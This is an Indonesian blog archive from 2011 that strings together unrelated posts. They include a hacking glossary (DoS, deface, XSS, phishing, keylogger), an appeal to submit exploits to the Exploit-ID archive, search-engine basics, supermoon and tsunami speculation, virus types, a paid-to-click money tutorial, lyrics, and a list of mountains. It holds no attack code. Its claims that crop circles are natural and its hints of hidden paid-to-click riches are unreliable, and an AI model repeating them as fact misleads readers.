  • serangan dgn melakukan request terus menerus pd victim dg tujuan untk mghabiskan resource pd victim, spt bandwith, memory, dll. Victim yg kehabisan resource, akan down. *"Distributed" DoS adalah DoS yg d lakukan secara terdistribusi atau berjamaah dlm jumlah besar, biasanya menggunakan bot pd irc atau pakai sesuatu tool.
Bug


Patch
  • adalah tambalan dalam bentuk source code, jadi yang ditambal itu bukan binarynya tapi source codenya. Ini berbeda dengan istilah Service Pack di sistem operasi lain yang bukan merupakan sebuah patch atau tambalan, karena Service Pack itu mengganti binary dengan binary yang baru yang mempunyai feature baru dan atau menutupi bug di binary yang lama.

Vurnerable
  • sebuah system yg mempunyai suatu kelemahan yg mudah untuk di serang
Shell

  • adalah program (penterjemah perintah) yang menjembatani user dengan sistem operasi dalam hal ini kernel (inti sistem operasi), umumnya shell menyediakan prompt sebagai user interface, tempat dimana user mengetikkan perintah-perintah yang diinginkan baik berupa perintah internal shell (internal command), ataupun perintah eksekusi suatu file progam (eksternal command), selain itu shell memungkinkan user menyusun sekumpulan perintah pada sebuah atau beberapa file untuk dieksekusi sebagai program.

Deface
  • adalah merubah tampilan web orang dg paksa dengan mengganti index halaman pada suatu website.

Debug
  • sebuah metode yang dilakukan oleh para pemrogram dan pengembang perangkat lunak untuk meng-analisa alur kerja program, mencari dan mengurangi bug, atau kerusakan di dalam sebuah program komputer atau perangkat keras sehingga perangkat tersebut bekerja sesuai dengan harapan. Debugging cenderung lebih rumit ketika beberapa subsistem lainnya terikat dengan ketat dengannya, mengingat sebuah perubahan di satu sisi, mungkin dapat menyebabkan munculnya bug lain di dalam subsistem lainnya.
XSS
  • adalah suatu cara memasukan code/script HTML kedalam suatu web site dan dijalankan melalui browser di client

Phising

  • adalah tindakan memperoleh informasi pribadi seperti User ID, password, PIN, nomor rekening bank, nomor kartu kredit Anda secara ilegal dalam bentuk sebuah web alias pemalsuan.

Keylogger

  • adalah mesin atau software yang dipasang atau diinstal di komputer agar mencatat semua aktivitas yang terjadi pada keyboard (bekerja diam diam alias tidak terketahui oleh kita secara kasat mata dalam artian katak spy )

Exploit-ID Indonesian Exploit Archive

Assalamualaikum warahmatullahi wabarokatuh
kmaren sya coba2 login lagi ke situs feelcomz eh g tau na ada info baru nih

maaf sebelom na nih mas jos_ali_joe aq copas dari feelcomz ea :D

Exploit ID adalah sebuah situs yg mempunyai beberapa kumpulan artikel2 , news tentang it , dan didalamnya memang lebih mengacu ke sebuah web yang menyimpan arsip2 dari eksploit2 yang ada , kita tahu sendiri bahwa banyak sekali orang2 indonesia yang telah mampu/bisa membuat eksploit2 sendiri , dan hanya ditampung oleh2 situs2 luar , misal : exploit-db , packetstromsecurity , inj3ct0r, security reason , exploit-db , dan lain2 , sangat disayangkan sekali karena belum ada arsip exploit buatan anak bangsa , maka Exploit ID membuat sebuah situs seperti tadi. yang bernama exploit-id ,

singkat sejarah terbentuknya Exploit-ID Indone*sian Exploit Archive yang mem*pun*yai tujuan untuk berbagi ten*tang hal kea*manan di bidang jaringan dan kom*puter. Awal berdiri Exploit-ID meru*pakan keti*dak*sen*ga*jaan founder per*tama yang mem*pun*yai cita-cita untuk mem*buat sebuah archive exploit. Dari ide terse*but terny*ata men*da*pat respon posi*tif dari beber*apa senior hacker di Indone*sia, sehingga dapat ter*ben*tuk*lah team untuk meng*garap Exploit-ID. Semoga Exploit-ID dapat men*jadi solusi arsip exploit yang berguna

oleh karena itu Exploit ID sangat mengharapkan bantuan dari kita2 , kawan2 semua di berbagai forum yang kita cintai ini , demi kemajuan IT indonesia menuju ke sebuah hal yang positif , untuk ikut berkontribusi mengirimkan exploit2 yang di punyainya atau hasil riset nya di web milik kita semua , tidak hanya itu Exploit ID juga menerima submit2 artikel2 lainnya yang berhubungan dengan dunia security IT , untuk rule dan proses submit artikel nya telah tercantum di website.

ini adalah situs/website kita semua , milik anak bangsa, mereka mempersembahkan untuk kemajuan IT indonesia ,karena website itu masih sangat2 jauh dari kata sempurna oleh karena itu doa dan dukungan terlebih moril dan support dari kita2 semua sangat mereka harapkan.

http://www.exploit-id.com

AnasKi CreW IRC Network Server

hello Viva AnasKi krn udh lama g update post akhirnya saya update lagi nih kli ni sya kan buat tutorial yg lebih mantap....

kali ini cukup dg server baru kami :D

irc.pasbar.com

untuk inginkan sebuah vhost bisa lansung menuju channel : #vhost
untuk bertanya silahkan masuk saja ke channel : #help dan tunggu respone dari kami

jika ada pertanyaan yg lain silahkan masuk ke channel anaski di irc.pasbar.com dan pv JFry_ jka ada waktu luang sya akan menjawab pertanyaan nya

jng lupa Free PsyBnc tapi hnya buat server anaski saja ya :D

Sabtu, 19 Maret 2011

Jenis-jenis Search Engine

Mesin pencari (search engine) adalah salah satu program komputer yang di rancang
khusus untuk membantu seseorang menemukan file-file yang disimpan dalam computer,
misalnya dalam sebuah web server umum di web (www) atau komputer sendiri. Mesin pencari
memungkinkan kita untuk meminta content media dengan criteria yang spesipik ( biasanya
berisikan prase atau kata yang kita inginkan) dan memperoleh daftar file yang memenuhi criteria
tersebut. Mesin pencari biasanya menggunakan indeks ( yang sudah di buat sebelumnya dan di
mutakhirkan secara teratur ) untuk mencari file setelah pengguna memasukan kriteria pencarian.
Mesin pencari yang akan saya bahas adalah mesin pencari khusus yang di gunakan untuk
mencari informasi dan berbagai file di Internet, sehingga mesin pencari sangat berguna bagi para
penggunanya untuk mencari berbagai bahan referensi atau lainnya.
Untuk memudahkan pencarian di database yang begitu besar, mesin pencari
menggunakan indeks untuk memilah-milah informasi yang ada di database. Sedangkan untuk
memudahkan dan mempercepat pencarian, mesin pencari mempunyai metode pencarian tertentu
yang sering di sebut algoritma pencarian, kecepatan dan ketepatan pencarian sebuah mesin
pencarian tergantung kepada cara pengindeksan dan algoritma pencarian ayng digunakan.

Struktur umum sebuah mesin pencari adalah sebagai berikut :

a. Kotak teks pencari
Kotak ini digunakan sebagai tempat memasukan kata kunci yang akan dijadikan
acuan dilakukan pencarian.

b. Tombol pencari
Tobol ini yang akan menjalankan perintah pencarian.

JENIS-JENIS MESIN PENCARI

Berdasarkan cara mengumpulkan data halaman-halaman web, mesin pencari dapat di
kelompokkan menjadi 4 kategori

- Human Organized Search Engine

Mesin pencari yang di kelola sepenuhnya oleh tangan manusia. Mesin pencari ini
menggunakan metode dengan memilah-milih informasi yang relevan dan dikelompokan
sedemikian rupa sehingga lebih bermakna dan bermanfaaat bagi penggunannya. Situs ini dalam
prakteknya memperkerjakan para pakar dalam bidang-bidang tertentu, kemudian para pakar
tersebut dapat mengkelompokan situs-situs tertentu sesuai dengan bidangnnya atau kategori situs
itu sendiri.

www.yahoo.com
www.looksmart.com
www.about.com
Dmoz.org

- Computer Created Search Engine

Search engine kategori ini banyak memiliki kelebihan karena banyak menyajikan
inforrmasi walaupun kadang-kadang ada beberapa informasi yang tida relevan tidak seperti yag
kita ingin kan. Search engine ini telah menggunakan software laba-laba atau spider software
yang berfungsi menyusup pada situs-situs tertentu, kemudian mengunpulkan data serta
mengelompokan dengan sedikit bantuan tangan manusia.

www.webcrawler.com
www.excite.com
www.inktomi.com
www.nothernlight.com
www.altheweb.com

- Hybrid Seacrh Engine

Merupakan gabungan antara tangan manusia dengan computer, sehingga menghasilkan
hasil pencarian yang relative akurat. Peran manusia dalam hal ini adalah sebagai penelaah dalam
proses pengkoleksian database halaman web. Sebenarnya tipe ini lah yanag paling mudah
pembuatannya menurut saya karena dapat di desaingsesuai dengan keinginan kita.

www.lycos.com
www.altavista.com
www.hotbot.com
www.goto.com
www.snap.com
www.directthit.com
www.google.com
go.com

- MetaCrawler/Metasearch
Merupakan perantara dari mesin pencari yang sebenarnya. Mesin ini hanya akan
mengirimkan permintaan pencarian ke berbagai mesin pencari serta menampilkan hasilnya satu
di layer browser sehingga akan menampilkan banyak sekali hasil dari ber bagai mesin pencari
yang ada.

savvysearch.com
www.dogpile.com
www.infind.com
www.snap.com

Cara kerja mesin pencari

Mesin pencari web bekerja dengan cara menyimpan informasi tertang banyak halaman
web, yang diambil secara langsung dari www. Halaman ini di ambil dengan web
crawler-browsewr web yang otomatis mengikuti setiap pranala yang di lihatnya. Isi setiap
halaman lalu dianalisis untuk menentukan cara mengindeksnya (misalnya kata-kata di ambil dari
judul, subjudul, atau field khusus yang di sebut meta tag ). Data tentang halaman web disimpan
dalam sebuah database indeks untuk di gunakan dalam pencarian selanjutnya. Sebagian mesin
pencari seperti Google, menyimpan seluruh atau sebagian halaman sumber ( yang di sebut cache)
maupun informasi tentang halaman web itu sendiri.
Ketika seorang pengguna menggunakan mesin pencari dan memasukin query, biasanya
dengan memasukan kata kunci, mesin mencari akan meng-
indesk dan memberikan daftar halaman web yang paling sesuai dengan kriterianya.
Daftar ini biasanya di sertai ringkasan singkat menggenai judul dokumen dan terkadang sebagian
teks dari hasil pencarian yang kita cari.

Sebenarnya Banyak sekali penjelasan-penjelasan yang lebih luas dan detail tentang Mesin
Pencari (search engine) yang bias anda dapatkan dari Internet atau media lainnya, saya
hanya berusaha memberikan sedikit ilmu yang sedikit saya tahu tentang mesin pencari.

REFERENSI

Eko Supriyadi, M.Pd. Teknologi Informasi dan Komunikasi Kelas XI. Sinar Mandiri: Klaten

http://id.wikipedia.com

Sabtu, 12 Maret 2011

bola putih saat tsunami jepang




Foto2 :


Dari YT :

perhatikan sebuah cahaya kecil dan putih seperti bola api yang keluar dari laut seblah kiri pada detik 00.34 semoga itu bukan pertanda apa2 dan semoga tsunami ini tidak mnengakibatkan banyak korban jiwa dan kerugian semoga bisa menjadi minimal , dan semoga semoga amin amin ya allah ya rabb 4 lokasi diindonesia yg dirmal terkenda dampak tsunami antara jam 18.00-20.00 waktu setempat tidak terjadi ,amin ya rabb amin ya allah : .
berikut perkiraan terjadi tsunami , sumber cnn:

1.Berebere, Maluku Utara, pukul 17.58 WIB
2. Manokwari, Papua Barat, pukul 18.18
3. Jayapura, Papua, pukul 18.35
4. Sorong, Papua, pukul 18.35

Bulan Dekati Bumi 19 Maret, Pertanda Bencana? [ Super Moon ]















Dongakkan kepala Anda ke arah langit malam, Sabtu 19 Maret 2011 mendatang. Jika mendung tidak menggantung, akan terlihat penampakan Bulan lain dengan biasanya.

Satelit Bumi itu akan nampak lebih besar. Di malam itu, Bulan akan berada dalam jarak terdekat dengan Bumi sejak tahun 1993, 18 tahun yang lalu. Fenomena ini disebut 'lunar perigee'. Sementara, ada astrolog yang menyebutnya 'SuperMoon'.

Penampakan Bulan malam itu akan sangat menarik untuk difoto. Tapi, sejumlah astronom meramalkan, kejadian itu mengkhawatirkan, karena akan mempengaruhi pola iklim di Bumi. Sebagian orang menghubung-hubungkan lunar perigee itu dengan bencana, seperti gempa.

Apa kata ilmuwan? "Tak akan ada gempa bumi atau gunung meletus," kata Pete Wheeler dari International Centre for Radio Astronomy, seperti dimuat News.com.au, Jumat 4 Maret 2011. "Kalau memang itu terjadi, itu sudah ditakdirkan."

Kata dia, saat itu, Bumi memang akan mengalami pasang lebih tinggi, dan surut lebih rendah dari biasanya. "Tak ada yang perlu dikhawatirkan," tambah Wheeler.

Untuk diketahui, sejumlah bencana di Bumi terjadi saat fenomena lunar perigee atau saat jarak antara Bumi dan Bulan dekat. Misalnya, badai New England pada 1938, atau banjir di Lembah Hunter pada 1955.

Meski tidak terjadi dalam periode itu, bencana Siklon Tracy pada 1974 dan badai Katrina pada 2005 juga terkait SuperMoon.

Mengamini pendapat Wheeler, astronom sekaligus dosen, David Reneke mengatakan, terlalu jauh untuk menghubungkan fenomena itu dengan bencana alam. "Kalau mau, Anda bisa saja menghubung-hubungkan hampir semua bencana alam yang terjadi dengan apa yang terlihat di langit malam -- komet, planet, matahari," kata Reneke.

Sementara, ilmuwan Bumi dan Planet dari Adelaide University, Dr Victor Gostin mengatakan, prediksi cuaca, gempa, gunung meletus, dan bencana alam lainnya berdasarkan konfigurasi planet, tidak pernah sukses.

Namun, memang dimungkinkan ada korelasi antara gempa bumi berskala besar di dekat katulistiwa dan Bulan -- kala baru, atau purnama.

"Analoginya seperti pasang surut air laut, pergerakan Bumi akibat gravitas Bulan bisa memicu gempa bumi." (umi)


Sumber : Vivanews

Gempa Jepang Akibat Fenomena Supermoon?

Sumber Dari : Vivanews

empa dan tsunami besar yang melanda Jepang, Jumat 11 Maret 2011 kemarin, disebut-sebut berhubungan dengan fenomena ‘supermoon’ atau ‘lunar perigee,’ yaitu fenomena mendekatnya bulan ke bumi yang sedang terjadi saat ini.

Isu supermoon akhir-akhir ini mengemuka di sejumlah media internasional. Sejumlah kalangan meyakini bahwa fenomena ini mengakibatkan bencana alam hebat seperti gempa bumi dan letusan gunung berapi. Gempa bumi 8,9 Skala Ritcher dan tsunami 13 kaki yang menghantam Jepang kemarin, seperti mengkonfirmasi teori supermoon ini.

Namun, hal itu dibantah oleh pakar gempa dari Pusat penelitian Geoteknologi LIPI, Danny Hilman Natawidjaja. Menurutnya, supermoon bukan penyebab utama terjadinya gempa bumi di Jepang. Danny menegaskan, kaitan antara supermoon dan bencana alam tidak memiliki dasar ilmiah.

“Masih banyak unsur mistiknya daripada ilmiahnya. Kita masih perlu melakukan peninjauan yang lebih ilmiah mengenai hal itu,” kata Danny ketika dihubungi VIVAnews, Sabtu 12 Maret 2011.

Namun, Danny mengakui gejala supermoon memang bukan berarti harus diabaikan sama sekali. Hal itu masih cukup penting untuk diperhatikan, dalam artian kajian ilmiah lebih lanjut penting untuk dilakukan.

“Kita harus menggunakan penelitian ilmiah sebagai patokan. Jangan berpatokan pada mitos-mitos atau hal-hal yang sifatnya mungkin kebetulan,” ujarnya.

Ia menekankan, imajinasi dan asumsi tidak berlaku dalam ilmu pengetahuan. Supermoon sendiri akan mencapai puncaknya pada tanggal 19 Maret 2011 mendatang.

Saat itu, bulan akan berada dalam jarak terdekatnya dengan bumi dalam kurun waktu 18 tahun terakhir. Lantas, apakah akan terjadi bencana lebih besar pada tanggal 19 Maret yang jatuh pada hari Sabtu pekan depan? Danny mengingatkan, jangan berspekulasi dan berasumsi.

Jumat, 11 Maret 2011

JENIS – JENIS VIRUS

Untuk lebih mempertajam pengetahuan kita tentang virus, Aku akan coba 
memberikan penjelasan tentang jenis-jenis virus yang sering berkeliaran
di dunia cyber.

1.Virus Makro
Jenis Virus ini pasti sudah sangat sering kita dengar.Virus ini ditulis
dengan bahasa pemrograman dari suatu aplikasi bukan dengan bahasa
pemrograman dari suatu Operating System. Virus ini dapat berjalan apabila
aplikasi pembentuknya dapat berjalan dengan baik, maksudnya jika pada
komputer mac dapat menjalankan aplikasi word maka virus ini bekerja pada
komputer bersistem operasi Mac.
contoh virus:

-variant W97M, misal W97M.Panther
panjang 1234 bytes,
akanmenginfeksi NORMAL.DOT dan menginfeksi dokumen apabila dibuka.
-WM.Twno.A;TW
panjang 41984 bytes,
akan menginfeksi Dokumen Ms.Word yang menggunakan bahasa makro, biasanya
berekstensi *.DOT dan *.DOC
-dll

2.Virus Boot Sector
Virus Boot sector ini sudah umum sekali menyebar.Virus ini dalam menggandakan
dirinya akan memindahkan atau menggantikan boot sector asli dengan program
booting virus. Sehingga saat terjadi booting maka virus akan di load kememori
dan selanjutnya virus akan mempunyai kemampuan mengendalikan hardware standar
(ex::monitor, printer dsb) dan dari memori ini pula virus akan menyebar
eseluruh drive yang ada dan terhubung kekomputer (ex: floopy, drive lain
selain drive c).
contoh virus :

-varian virus wyx
ex: wyx.C(B) menginfeksi boot record dan floopy ;
panjang :520 bytes;
karakteristik : memory resident dan terenkripsi)
-varian V-sign :
menginfeksi : Master boot record ;
panjang 520 bytes;
karakteristik: menetap di memori (memory resident),terenkripsi, dan polymorphic)
-Stoned.june 4th/ bloody!:
menginfeksi : Master boot record dan floopy;
panjang 520 bytes;
karakteristik: menetap di memori (memory resident), terenkripsi dan menampilkan
pesan"Bloody!june 4th 1989" setelah komputer melakukan booting sebanyak 128 kali

3.Stealth Virus
Virus ini akan menguasai tabel tabel interupt pada DOS yang sering kita kenal
dengan "Interrupt interceptor" . virus ini berkemampuan untuk mengendalikan
instruksi instruksi level DOS dan biasanya mereka tersembunyi sesuai namanya
baik secara penuh ataupun ukurannya .
contoh virus:
-Yankee.XPEH.4928,
menginfeksi file *.COM dan *.EXE ;
panjang 4298 bytes;
karakteristik: menetap di memori, ukurantersembunyi, memiliki pemicu
-WXYC (yang termasuk kategori boot record pun karena masuk kategri stealth
dimasukkan pula disini), menginfeksi floopy an motherboot record;
panjang 520 bytes;
menetap di memori; ukuran dan virus tersembunyi.
-Vmem(s):
menginfeksi file file *.EXE, *.SYS, dan *.COM ;
panjang fie 3275 bytes;
karakteristik:menetap di memori, ukuran tersembunyi, di enkripsi.
-dll

4.Polymorphic Virus
Virus ini Dirancang buat mengecoh program antivirus,artinya virus ini selalu
berusaha agar tidak dikenali oleh antivirus dengan cara selalu merubah rubah
strukturnya setiap kali selesai menginfeksi file/program lain.

contoh virus:

-Necropolis A/B,
menginfeksi file *.EXE dan *.COM;
panjang file 1963 bytes;
karakteristik: menetap di memori, ukuran dan virus tesembunyi,terenkripsi dan
dapat berubah ubah struktur
-Nightfall,
menginfeksi file *.EXE;
panjang file 4554 bytes;
karakteristik : menetap di memori, ukuran dan virus tesembunyi,memiliki pemicu,
terenkripsidan dapat berubah-ubah struktur
-dll


5.Virus File/Program
Virus ini menginfeksi file file yang dapat dieksekusi langsung dari sistem operasi,
baik itu file application (*.EXE), maupun *.COm biasanya juga hasil infeksi
dari virus ini dapat diketahui dengan berubahnya ukuran file yang diserangnya.


6.Multi Partition Virus
Virus ini merupakan gabungan dariVirus Boot sector dan Virus file: artinya
pekerjaan yang dilakukan berakibat dua, yaitu dia dapat menginfeksi file-
file *.EXE dan juga menginfeksi Boot Sector.

ASAL MUASAL VIRUS

1949, John Von Neuman, menggungkapkan   " teori self altering automata "
yang merupakan hasil riset dari para ahli matematika.

1960, lab BELL (AT&T), para ahli di lab BELL (AT&T) mencoba-coba teori
yang diungkapkan oleh john v neuman, mereka bermain-main dengan teori
tersebut untuk suatu jenis permainan/game. Para ahli tersebut membuat
program yang dapat memperbanyak dirinya dan dapat menghancurkan program
buatan lawan.Program yang mampu bertahan dan menghancurkan semua program
lain, maka akan dianggap sebagai pemenangnya. Permainan ini akhirnya
menjadi permainan favorit ditiap-tiap lab komputer.semakin lama mereka
pun sadar dan mulai mewaspadai permainan ini dikarenakan program yang
diciptakan makin lama makin berbahaya, sehingga mereka melakukan
pengawasan dan pengamanan yang ketat.

1980, program tersebut yang akhirnya dikenal dengan nama "virus" ini
berhasil menyebar diluar lingkungan laboratorium, dan mulai beredar di
dunia cyber.

1980, mulailah dikenal virus-virus yang menyebar di dunia cyber.

Cara mengclick view ads onbux

Maaf Sebelum nya artikel ini saya copas dari blogger suhuptc
Berikut ini akan saya jelaskan tutorial untuk mengikuti program Onbux. Program ini adalah termasuk PTC (Paid to Click) terbaik saat ini. Cara kerja PTC ini adalah sederhana saja, yaitu kita diharuskan melihat iklan (website) lain selama kira-kira 30 detik (tergantung koneksi internet komputer anda).

Untuk satu iklan yang kita lihat kita akan dibayar $0,01. Apabila anda baru pertama kali menjadi anggota Onbux (seperti saya) maka akan mendapat 4 iklan dalam 1 hari (24 jam). Iklan yang telah dilihat (diclick) baru bisa diclick lagi setelah 24jam. Sehingga dalam sehari anda hanya dapat menggumpulkan $0,01 X 4 = $0,04/hari. Ha..ha..ha
mungkin anda tertawa melihat tiap hari hanya bisa mengantongi $0,04 atau sekitar 300 rupiah, dengan melihat iklan. Namun percayalah bahwa ada "sesuatu yang tersembunyi" pada program ini yang memungkinkan seseorang untuk mendapat jutaan rupiah tiap HARI!!! Wow...bagiamana caranya?

Akan saya bahas dipostingan berikutnya. Sekarang saya hanya akan menjelaskan cara mudah (dasar) menjalankan OnBux.

Nah yang pertama harus anda lakukan adalah mendaftar jadi member Onbux.com.
Setelah mendaftar silahkan anda login menggunakan Username dan Password anda.




Anda akan melihat halaman web seperti ini :



Silahkan anda klik "View Ads". Akan ada 4 buah iklan yang dapat anda klik berurutan satu demi satu. Ingat tidak boleh langsung empat-empatnya di klik.



Nah tiap iklan di klik akan muncul tanda bulatan biru. Anda diinstruksikan untuk mengklik pada bulatan ini. Ini adalah suatu sistim untuk menghindari kecurangan (robot software yang bisa mengclick otomatis). Setelah itu akan terbuka sebuah iklan (berbentuk halaman Website). Lihat gambar.



Kemudian tunggu sampai muncul tanda bar progress(di kiri atas) yang akan berubah warnanya menjadi hijau. selesai dalam waktu 30 detik(tergantung jaringan internet komputer anda). Sekali lagi anda akan dites untuk mengetahui bahwa anda benar manusia dan bukan robot software yang mengklik otomatis. Silahkan anda klik pada huruf yang sama.





Gambar diatas menyatakan bahwa iklan yang kita klik telah dibayar oleh neobux senilai $0.01.


Setelah terkumpul $2 lebih kita dapat payout. Ingat karena payoutnya kecil, maka ada sedikit fee yang diambil oleh Paypal. Setelah payout, tentu saja rekening kita di Onbux akan manjadi $0.00. Dan kita mulai lagi dari awal..! Gampang bukan..! Dan ingat, KLIK IKLAN ANDA SETIAP HARI untuk hasil yang lebih optimal...!

Register Disini :D

Sabtu, 12 Februari 2011

Sabtu, 05 Februari 2011

Jumat, 04 Februari 2011

baim - ratapanku mp3 + lyric [ost bintang untuk baim] di sctv

Download lagu Baim - Ratapanku (Ost. Bintang Untuk Baim) terbaru disini. Lagu Baim - Ratapanku (Ost. Bintang Untuk Baim) sedang ngetop sekarang ini. Dengarkan lagu Baim - Ratapanku (Ost. Bintang Untuk Baim) yang lain yang ga kalah keren dengan membeli album cd original Baim - Ratapanku (Ost. Bintang Untuk Baim) atau pasang RBT Baim - Ratapanku (Ost. Bintang Untuk Baim) di ponsel anda.
www.anaski.co.cc
Download : baim - ratapanku (ost. bintang untuk baim).mp3
www.anaski.co.cc
Lyric :
www.anaski.co.cc
apa karna aku semuanya begini
bisakah aku menebus salahku
malaikat malam coba dengar aku
dengar ratapan hatiku
www.anaski.co.cc
* dimana rumahMu Tuhan Maha Esa
tempat papa tidur di sampingMu Tuhan
kata bunda aku bisa jumpa dia
papa di rumah Tuhan
www.anaski.co.cc
reff:
kini tinggal kita yang masih terbangun
baik buruk hidup masih terlewati
hujanku berhenti sebentar saja
ku mau bicara

biar Tuhan dengar ratapan hatiku
aku berjanji menjaga bunda
dari keras hidup
dengarkanlah ratapanku

repeat *
repeat reff

biar Tuhan dengar ratapan hatiku
aku berjanji menjaga bunda
dari keras hidup
dengarkanlah ratapanku
www.anaski.co.cc

fenomena alam terbaru Crop Circle atau lingkaran taman

Crop Circle atau lingkaran taman adalah sebuah fenomena alam yang banyak di jumpai sekarang di bumi ini menurut beberapa orang crop circle terbentuk dari Padi yang masih hijau ambruk di tengah sawah membentuk pola lingkaran yang sangat rapi.Istilah ilmiah untuk fenomena alam ini biasa disebut dengan istilah crop circles atau linkar taman.
Berikut beberapa gambar nya

fenomena alam terbaru Crop Circle atau lingkaran taman


fenomena alam terbaru Crop Circle atau lingkaran taman

fenomena alam terbaru Crop Circle atau lingkaran taman

fenomena alam terbaru Crop Circle atau lingkaran taman

fenomena alam terbaru Crop Circle atau lingkaran taman

fenomena alam terbaru Crop Circle atau lingkaran taman

fenomena alam terbaru Crop Circle atau lingkaran taman

100 Daftar Puncak gunung tertinggi di dunia

Berikut adalah daftar puncak gunung tertinggi di dunia:

1. Everest, pegunungan Himalaya, Nepal/Tibet, 29,035 ft / 8,850 m.
2. K2 (Godwin Austen), pegunungan Karakoram, Pakistan/Cina, 28,250 ft / 8,611 m.
3. Kangchenjunga, pegunungan Himalaya, India/Nepal, 28,169 ft / 8,586 m.
4. Lhotse I, pegunungan Himalaya, Nepal/Tibet, 27,940 ft / 8,516 m.
5. Makalu I, pegunungan Himalaya, Nepal/Tibet, 27,766 ft / 8,463 m.
6. Cho Oyu, pegunungan Himalaya, Nepal/Tibet, 26,864 ft / 8,188 m.
7. Dhaulagiri, pegunungan Himalaya, Nepal, 26,795 ft / 8,167 m.
8. Manaslu I, pegunungan Himalaya, Nepal, 26,781 ft / 8,163 m.
9. Nanga Parbat, pegunungan Himalaya, Pakistan, 26,660 ft / 8,125 m.
10. Annapurna, pegunungan Himalaya, Nepal, 26,545 ft / 8,091 m.
11. Gasherbrum I, pegunungan Karakoram, Pakistan/Cina, 26,470 ft / 8,068 m.
12. Puncak Broad, pegunungan Karakoram, Pakistan/Cina, 26,400 ft / 8,047 m.
13. Gasherbrum II, pegunungan Karakoram, Pakistan/Cina, 26,360 ft / 8,035 m.
14. Shishapangma (Gosainthan), pegunungan Himalaya, Tibet, 26,289 ft / 8,013 m.
15. Annapurna II, pegunungan Himalaya, Nepal, 26,041 ft / 7,937 m.
16. Gyachung Kang, pegunungan Himalaya, Nepal, 25,910 ft / 7,897 m.
17. Distaghil Sar, pegunungan Karakoram, Pakistan, 25,858 ft / 7,882 m.
18. Himalchuli, pegunungan Himalaya, Nepal, 25,801 ft / 7,864 m.
19. Nuptse, pegunungan Himalaya, Nepal, 25,726 ft / 7,841 m.
20. Nanda Devi, pegunungan Himalaya, India, 25,663 ft / 7,824 m.
21. Masherbrum, pegunungan Karakoram, Kashmir, 25,660 ft / 7,821 m.
22. Rakaposhi, pegunungan Karakoram, Pakistan, 25,551 ft / 7,788 m.
23. Kanjut Sar, pegunungan Karakoram, Pakistan, 25,461 ft / 7,761 m.
24. Kamet, pegunungan Himalaya, India/Tibet, 25,446 ft / 7,756 m.
25. Namcha Barwa, pegunungan Himalaya, Tibet, 25,445 ft / 7,756 m.
26. Gurla Mandhata, pegunungan Himalaya, Tibet, 25,355 ft / 7,728 m.
27. Ulugh Muztagh, Kunlun, Tibet, 25,340 ft / 7,723 m.
28. Kungur, Muztagh Ata, Cina, 25,325 ft / 7,719 m.
29. Tirich Mir, Hindu Kush, Pakistan, 25,230 ft / 7,690 m.
30. Saser Kangri, pegunungan Karakoram, India, 25,172 ft / 7,672 m.
31. Makalu II, pegunungan Himalaya, Nepal, 25,120 ft / 7,657 m.
32. Minya Konka (Gongga Shan), pegunungan Daxue, Cina, 24,900 ft / 7,590 m.
33. Kula Kangri, pegunungan Himalaya, Bhutan, 24,783 ft / 7,554 m.
34. Chang-tzu, pegunungan Himalaya, Tibet, 24,780 ft / 7,553 m.
35. Muztagh Ata, pegununganMuztagh Ata, Cina, 24,757 ft / 7,546 m.
36. Skyang Kangri, pegunungan Himalaya, Kashmir, 24,750 ft / 7,544 m.
37. Puncak Ismail Samani (dulu Puncak Stalin dan Puncak Komunis), pegunungan Pamir Tajikistan, 24,590 ft / 7,495 m.
38. Puncak Jongsong, pegunungan Himalaya, Nepal, 24,472 ft / 7,459 m.
39. Puncak Pobeda, Tien Shan, Kyrgyzstan, 24,406 ft/ 7,439 m.
40. Sia Kangri, pegunungan Himalaya, Kashmir, 24,350 ft / 7,422 m.
41. Puncak Haramosh, pegunungan Karakoram, Pakistan, 24,270 ft / 7,397 m.
42. Istoro Nal, pegunungan Hindu Kush, Pakistan, 24,240 ft / 7,388 m.
43. Puncak Tent, pegunungan Himalaya, Nepal, 24,165 ft / 7,365 m.
44. Chomo Lhari, pegunungan Himalaya, Tibet/Bhutan, 24,040 ft / 7,327 m.
45. Chamlang, pegunungan Himalaya, Nepal, 24,012 ft / 7,319 m.
46. Kabru, pegunungan Himalaya, Nepal, 24,002 ft / 7,316 m.
47. Alung Gangri, pegunungan Himalaya, Tibet, 24,000 ft / 7,315 m.
48. Baltoro Kangri, pegunungan Himalaya, Kashmir, 23,990 ft / 7,312 m.
49. Muztagh Ata (K-5), pegununganKunlun, Cina, 23,890 ft / 7,282 m.
50. Mana, pegunungan Himalaya, India, 23,860 ft / 7,273 m.
51. Baruntse, pegunungan Himalaya, Nepal, 23,688 ft / 7,220 m.
52. Puncak Nepal, pegunungan Himalaya, Nepal, 23,500 ft / 7,163 m.
53. Amne Machin, pegununganKunlun, Cina, 23,490 ft / 7,160 m.
54. Gauri Sankar, pegunungan Himalaya, Nepal/Tibet, 23,440 ft / 7,145 m.
55. Badrinath, pegunungan Himalaya, India, 23,420 ft / 7,138 m.
56. Nunkun, pegunungan Himalaya, Kashmir, 23,410 ft / 7,135 m.
57. Puncak Lenin, pegunungan Pamir, Tajikistan/Kyrgyzstan, 23,405 ft / 7,134 m.
58. Pyramid, pegunungan Himalaya, Nepal, 23,400 ft / 7,132 m.
59. Api, pegunungan Himalaya, Nepal, 23,399 ft / 7,132 m.
60. Pauhunri, pegunungan Himalaya, India/Cina, 23,385 ft / 7,128 m.
61. Trisul, pegunungan Himalaya, India, 23,360 ft / 7,120 m.
62. Puncak Korzhenevski, pegunungan Pamir, Tajikistan, 23,310 ft / 7,105 m.
63. Kangto, pegunungan Himalaya, Tibet, 23,260 ft / 7,090 m.
64. Nyainqentanglha, Nyainqentanglha Shan, Cina, 23,255 ft / 7,088 m.
65. Trisuli, pegunungan Himalaya, India, 23,210 ft / 7,074 m.
66. Dunagiri, pegunungan Himalaya, India, 23,184 ft / 7,066 m.
67. Puncak Revolution, pegunungan Pamir, Tajikistan, 22,880 ft / 6,974 m.
68. Aconcagua, pegunungan Andes, Argentina, 22,834 ft / 6,960 m.
69. Ojos del Salado, pegunungan Andes, Argentina/Chili, 22,664 ft / 6,908 m.
70. Bonete, pegunungan Andes, Argentina/Chili, 22,546 ft / 6,872 m.
71. Ama Dablam, pegunungan Himalaya, Nepal, 22,494 ft / 6,856 m.
72. Tupungato, pegunungan Andes, Argentina/Chili, 22,310 ft / 6,800 m.
73. Puncak Moscow, pegunungan Pamir, Tajikistan, 22,260 ft / 6,785 m.
74. Pissis, pegunungan Andes, Argentina, 22,241 ft / 6,779 m.
75. Mercedario, pegunungan Andes, Argentina/Chili, 22,211 ft / 6,770 m.
